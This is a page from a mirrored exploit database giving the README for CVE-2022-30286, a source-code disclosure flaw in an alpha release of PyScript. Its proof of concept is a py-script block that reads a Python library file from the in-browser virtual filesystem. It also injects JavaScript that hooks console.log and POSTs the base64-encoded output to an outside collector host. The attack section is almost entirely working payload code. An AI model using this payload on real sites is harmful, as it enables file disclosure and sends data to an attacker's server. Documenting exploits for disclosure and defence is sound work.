openkylin
/
openkylin-exploit-db
mirror of https://gitee.com/openkylin/openkylin-exploit-db.git
9
0
Fork 0
Code Issues Projects Releases Wiki Activity
openkylin-exploit-db/cve/python/2022/CVE-2022-30286
History
fanyunpeng c6814330ee update cve/python/2022/CVE-2022-30286/README.md. 
Signed-off-by: fanyunpeng <cn_2023@buaa.edu.cn>
 		2023-03-20 05:58:41 +00:00
..
CVE-2022-30286.txt poc 2023-03-20 05:58:41 +00:00
README.md update cve/python/2022/CVE-2022-30286/README.md. 2023-03-20 05:58:41 +00:00

README.md

PyScript Remote Emscripten VMemory Python libraries

Date: 5-9-2022
Exploit Author: Momen Eldawakhly (Cyber Guy)
Vendor Homepage: https://pyscript.net/
Software Link: https://github.com/pyscript/pyscript
Version: 2022-05-04-Alpha
Tested on: Ubuntu Apache Server
CVE : CVE-2022-30286

Poc

<py-script>
x = "CyberGuy"
if x == "CyberGuy":
    with open('/lib/python3.10/asyncio/tasks.py') as output:
        contents = output.read()
        print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>

reference

http://packetstormsecurity.com/files/167069/PyScript-2022-05-04-Alpha-Source-Code-Disclosure.html
https://cyber-guy.gitbook.io/cyber-guy/blogs/the-art-of-vulnerability-chaining-pyscript
https://cyber-guy.gitbook.io/cyber-guy/pocs/pyscript-file-read
https://github.com/pyscript/pyscript/commits/main
https://www.exploit-db.com/exploits/50918